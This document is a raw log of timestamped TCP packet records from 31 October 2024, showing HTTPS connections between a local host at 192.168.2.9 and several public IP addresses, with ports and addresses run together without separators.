                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.806823969 CET4434998013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.815045118 CET4434998213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.815470934 CET49982443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.815485001 CET4434998213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.815928936 CET49982443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.815934896 CET4434998213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.839329004 CET4434998413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.840163946 CET49984443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.840209961 CET4434998413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.840610027 CET49984443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.840621948 CET4434998413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.873987913 CET4434998113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.874530077 CET49981443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.874564886 CET4434998113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.875345945 CET49981443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.875358105 CET4434998113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.934456110 CET4434997913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.934709072 CET4434997913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.934721947 CET4434998013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.934752941 CET4434998013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.934776068 CET49979443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.934801102 CET4434998013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.934813023 CET49979443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.934813023 CET49979443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.934830904 CET4434997913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.934834957 CET49980443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.934839964 CET4434997913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.934854031 CET49980443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.935101032 CET49980443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.935128927 CET4434998013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.935142994 CET49980443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.935152054 CET4434998013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.938294888 CET49999443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.938333988 CET4434999913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.938374996 CET50000443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.938406944 CET49999443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.938409090 CET4435000013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.938513041 CET50000443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.938555002 CET49999443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.938569069 CET4434999913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.938643932 CET50000443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.938653946 CET4435000013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.959427118 CET4434998213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.959515095 CET4434998213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.959585905 CET49982443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.960613966 CET49982443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.960634947 CET4434998213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.960645914 CET49982443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.960652113 CET4434998213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.965666056 CET50001443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.965713024 CET4435000113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.965858936 CET50001443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.966059923 CET50001443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.966069937 CET4435000113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.982839108 CET4434998413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.982928991 CET4434998413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.982999086 CET49984443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.983159065 CET49984443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.983179092 CET4434998413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.983190060 CET49984443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.983195066 CET4434998413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.985908031 CET50002443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.985938072 CET4435000213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.986093044 CET50002443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.986248016 CET50002443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.986255884 CET4435000213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.009896994 CET4434998113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.009959936 CET4434998113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.010023117 CET49981443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.010864973 CET49981443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.010881901 CET4434998113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.010891914 CET49981443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.010896921 CET4434998113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.014612913 CET50003443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.014647961 CET4435000313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.014750004 CET50003443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.015005112 CET50003443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.015017986 CET4435000313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.317975998 CET44349988108.156.60.64192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.318216085 CET49988443192.168.2.9108.156.60.64
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.318243027 CET44349988108.156.60.64192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.319377899 CET44349988108.156.60.64192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.319456100 CET49988443192.168.2.9108.156.60.64
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.320662022 CET49988443192.168.2.9108.156.60.64
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.320739985 CET44349988108.156.60.64192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.320900917 CET49988443192.168.2.9108.156.60.64
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.320913076 CET44349988108.156.60.64192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.335937977 CET4434999163.32.87.126192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.337129116 CET49991443192.168.2.963.32.87.126
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.337157011 CET4434999163.32.87.126192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.338896036 CET4434999163.32.87.126192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.338985920 CET49991443192.168.2.963.32.87.126
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.339611053 CET49991443192.168.2.963.32.87.126
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.339720011 CET4434999163.32.87.126192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.339936018 CET49991443192.168.2.963.32.87.126
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.339945078 CET4434999163.32.87.126192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.363517046 CET4434999063.32.87.126192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.363817930 CET49990443192.168.2.963.32.87.126
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.363831043 CET4434999063.32.87.126192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.364943981 CET4434999063.32.87.126192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.365006924 CET49990443192.168.2.963.32.87.126
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.366066933 CET49990443192.168.2.963.32.87.126
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.366128922 CET4434999063.32.87.126192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.366256952 CET49990443192.168.2.963.32.87.126
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.407329082 CET4434999063.32.87.126192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.428186893 CET49988443192.168.2.9108.156.60.64
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.428194046 CET49990443192.168.2.963.32.87.126
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.428205013 CET4434999063.32.87.126192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.428227901 CET49991443192.168.2.963.32.87.126
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.462034941 CET443499953.162.38.87192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.462322950 CET49995443192.168.2.93.162.38.87
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.462358952 CET443499953.162.38.87192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.463478088 CET443499953.162.38.87192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.463591099 CET49995443192.168.2.93.162.38.87
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.463975906 CET49995443192.168.2.93.162.38.87
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.464046955 CET443499953.162.38.87192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.464153051 CET49995443192.168.2.93.162.38.87
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.464164972 CET443499953.162.38.87192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.474555969 CET4434999252.214.60.57192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.475595951 CET49992443192.168.2.952.214.60.57
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.475625992 CET4434999252.214.60.57192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.476125956 CET4434999252.214.60.57192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.476639986 CET49992443192.168.2.952.214.60.57
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.476728916 CET4434999252.214.60.57192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.476836920 CET49992443192.168.2.952.214.60.57
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.519339085 CET4434999252.214.60.57192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.584849119 CET4434999163.32.87.126192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.584958076 CET4434999163.32.87.126192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.585288048 CET49991443192.168.2.963.32.87.126
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.585859060 CET49991443192.168.2.963.32.87.126
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.585884094 CET4434999163.32.87.126192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.592922926 CET50007443192.168.2.952.214.60.57
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.592956066 CET4435000752.214.60.57192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.593991995 CET50007443192.168.2.952.214.60.57
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.594197989 CET50007443192.168.2.952.214.60.57
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.594213963 CET4435000752.214.60.57192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.619302034 CET49990443192.168.2.963.32.87.126
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.619343042 CET49995443192.168.2.93.162.38.87
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.620038033 CET4434999063.32.87.126192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.620131016 CET4434999063.32.87.126192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.620181084 CET49990443192.168.2.963.32.87.126
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.620868921 CET49990443192.168.2.963.32.87.126
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.620887041 CET4434999063.32.87.126192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.624488115 CET44349997172.217.18.100192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.624700069 CET49997443192.168.2.9172.217.18.100
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.624722958 CET44349997172.217.18.100192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.625082970 CET44349997172.217.18.100192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.625482082 CET49997443192.168.2.9172.217.18.100
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.625586987 CET44349997172.217.18.100192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.625658989 CET49997443192.168.2.9172.217.18.100
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.627820969 CET50009443192.168.2.952.214.60.57
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.627912045 CET4435000952.214.60.57192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.628129005 CET50009443192.168.2.952.214.60.57
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.628438950 CET50009443192.168.2.952.214.60.57
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.628468990 CET4435000952.214.60.57192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.632330894 CET50010443192.168.2.934.117.77.79
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.632373095 CET4435001034.117.77.79192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.632450104 CET50010443192.168.2.934.117.77.79
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.632668018 CET50010443192.168.2.934.117.77.79
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.632683039 CET4435001034.117.77.79192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.646759987 CET44349998172.217.18.100192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.647095919 CET49998443192.168.2.9172.217.18.100
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.647133112 CET44349998172.217.18.100192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.647521973 CET44349998172.217.18.100192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.649667978 CET49998443192.168.2.9172.217.18.100
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.649765015 CET44349998172.217.18.100192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.650032997 CET49998443192.168.2.9172.217.18.100
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.667331934 CET44349997172.217.18.100192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.691339016 CET44349998172.217.18.100192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.713335037 CET4434999913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.715473890 CET49999443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.715495110 CET4434999913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.716126919 CET49999443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.716134071 CET4434999913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.718753099 CET4435000013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.719130039 CET50000443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.719171047 CET4435000013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.719518900 CET50000443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.719526052 CET4435000013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.726089954 CET4435000213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.726886988 CET50002443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.726905107 CET4435000213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.727808952 CET50002443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.727818012 CET4435000213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.729450941 CET4434999252.214.60.57192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.729517937 CET4434999252.214.60.57192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.729885101 CET49992443192.168.2.952.214.60.57
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.730412960 CET49992443192.168.2.952.214.60.57
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.730433941 CET4434999252.214.60.57192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.742027998 CET49997443192.168.2.9172.217.18.100
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.747864962 CET4435000313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.748572111 CET50003443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.748590946 CET4435000313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.748924971 CET4435000113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.749176025 CET50003443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.749182940 CET4435000313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.749469995 CET50001443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.749481916 CET4435000113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.750111103 CET50001443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.750114918 CET4435000113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.843446016 CET4434999913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.843943119 CET4434999913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.844002008 CET4434999913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.844005108 CET49999443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.844060898 CET49999443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.844352007 CET49999443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.844352007 CET49999443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.844381094 CET4434999913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.844392061 CET4434999913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.847537994 CET50011443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.847601891 CET4435001113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.847680092 CET50011443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.847908020 CET50011443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.847932100 CET4435001113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.853070974 CET4435000013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.853265047 CET4435000013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.853338003 CET50000443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.853516102 CET50000443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.853537083 CET4435000013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.853549004 CET50000443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.853554010 CET4435000013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.856946945 CET50012443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.856996059 CET4435000213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.857057095 CET4435001213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.857074022 CET4435000213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.857147932 CET50012443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.857260942 CET50002443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.857636929 CET50002443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.857656002 CET4435000213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.857820988 CET50002443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.857831001 CET4435000213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.857903004 CET50012443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.857980013 CET4435001213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.860883951 CET50013443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.860912085 CET4435001313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.861040115 CET50013443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.861383915 CET50013443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.861393929 CET4435001313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.878233910 CET4435000313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.878314018 CET4435000313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.878384113 CET50003443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.878406048 CET4435000313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.878458023 CET4435000313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.878585100 CET50003443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.878698111 CET50003443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.878698111 CET50003443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.878712893 CET4435000313.107.246.45192.168.2.9
